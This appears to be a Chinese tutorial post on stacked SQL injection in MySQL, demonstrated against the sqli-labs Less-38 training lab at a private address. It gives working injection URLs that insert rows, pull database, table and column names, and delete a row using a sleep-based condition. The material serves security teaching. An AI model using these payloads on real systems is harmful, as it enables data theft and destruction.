Mysql注入 -- 堆叠注入

本文涉及的产品
RDS MySQL DuckDB 分析主实例,基础系列 4核8GB
RDS MySQL DuckDB 分析主实例,集群系列 4核8GB
RDS AI 助手,专业版
简介: Mysql注入 -- 堆叠注入

一、堆叠注入介绍

1、多条sql语句同时执行

2、union只能执行查询语句,堆叠可以执行增删改查

3、同时执行三条语句

select 1;select 2;select 3;

0a2653c851af460fa595bd959398a8f1.png

二、插入注入

1、找到注入点,添加一条数据

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(66,'aiyou','bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=66

0eacb84100b54626af849e6b562bf92a.png

2、获取数据库名称

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(67,database(),'bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=67获取数据库名称

2d65d23f6d4748949b924e4057485923.png

3、获取数据库中的表名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(71,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 2,1) ,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=71获取表名信息

2e9b90b2ca334476abebe75bafe6eeaa.png

4、获取表中的字段名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(74,(select column_name from information_schema.columns where table_name="users" limit 13,1) ,(select column_name from information_schema.columns where table_name="users" limit 12,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=74获取字段信息

4cebaac233b3433da32a72337a77fc60.png

三、删除删除注入

http://192.168.139.129/sqli/Less-38/?id=1';delete from users where id=74 and sleep(if((select database())=0x7365637572697479,5,0));

禁止非法,后果自负

相关实践学习
如何快速连接云数据库RDS MySQL
本场景介绍如何通过阿里云数据管理服务DMS快速连接云数据库RDS MySQL,然后进行数据表的CRUD操作。
MySQL数据库入门学习
本课程通过最流行的开源数据库MySQL带你了解数据库的世界。   相关的阿里云产品:云数据库RDS MySQL 版 阿里云关系型数据库RDS(Relational Database Service)是一种稳定可靠、可弹性伸缩的在线数据库服务,提供容灾、备份、恢复、迁移等方面的全套解决方案,彻底解决数据库运维的烦恼。 了解产品详情: https://www.aliyun.com/product/rds/mysql 
目录
相关文章
|
SQL 关系型数据库 MySQL
【MySQL进阶之路丨第十四篇】一文带你精通MySQL重复数据及SQL注入
【MySQL进阶之路丨第十四篇】一文带你精通MySQL重复数据及SQL注入
181 0
|
11月前
|
SQL 安全 关系型数据库
mysql注入-字符编码技巧
通过字符编码技巧,攻击者可以在SQL注入中绕过常见的输入验证机制,成功攻击数据库。因此,理解这些技巧及其可能的攻击路径,对防御SQL注入至关重要。开发者应采取多层次的安全措施,确保应用程序在不同字符集和编码环境下都能有效防御注入攻击。通过强制使用统一编码、严格的输入验证、预编译语句以及多层次的编码检查,可以有效地提高系统的安全性,防止SQL注入攻击带来的风险。
402 72
|
关系型数据库 MySQL
Mysql注入 -- 注入类型
Mysql注入 -- 注入类型
114 1
|
安全 关系型数据库 MySQL
Mysql注入 -- 数据库导出及读文件
Mysql注入 -- 数据库导出及读文件
219 0
|
安全 关系型数据库 MySQL
Mysql注入 -- 联合注入
Mysql注入 -- 联合注入
133 0
|
关系型数据库 MySQL 数据库
Mysql注入 -- 布尔注入
Mysql注入 -- 布尔注入
138 0
|
安全 关系型数据库 MySQL
Mysql注入 -- 延时注入
Mysql注入 -- 延时注入
472 0
|
安全 关系型数据库 MySQL
Mysql注入 -- 报错注入
Mysql注入 -- 报错注入
210 0
|
安全 关系型数据库 MySQL
MySQL注入 -- 宽字节注入
MySQL注入 -- 宽字节注入
190 0
|
SQL 关系型数据库 MySQL
Mysql注入 -- 堆叠注入
Mysql注入 -- 堆叠注入
329 0

推荐镜像

更多